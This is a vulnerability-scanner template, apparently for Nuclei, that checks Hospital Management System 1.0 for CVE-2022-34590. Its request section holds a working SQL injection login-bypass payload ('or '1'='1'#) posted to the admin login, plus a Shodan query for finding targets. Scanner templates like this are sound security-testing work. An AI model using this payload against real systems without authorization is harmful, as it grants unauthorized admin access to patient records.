56 lines
2.0 KiB
YAML
56 lines
2.0 KiB
YAML
id: CVE-2022-34590
|
|
|
|
info:
|
|
name: Hospital Management System 1.0 - SQL Injection
|
|
author: arafatansari
|
|
severity: high
|
|
description: |
|
|
Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34590
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2022-34590
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00618
|
|
epss-percentile: 0.76402
|
|
cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: hospital_management_system_project
|
|
product: hospital_management_system
|
|
shodan-query: http.html:"Hospital Management System"
|
|
tags: cve,cve2022,hms,cms,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /hms/admin/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
|
|
|
|
cookie-reuse: true
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<title>Admin | Dashboard</title>'
|
|
- 'Manage Patients'
|
|
- 'Manage Doctors'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022056a5d18f03a0579a891254b1f5e2a0b6ef33628412586bee40c768452f5710570220136362955b1a830cf9f68f4d795c7c5b2ae1fbfda599846620fba150b13449df:922c64590222798bb761d5b6d8e72950 |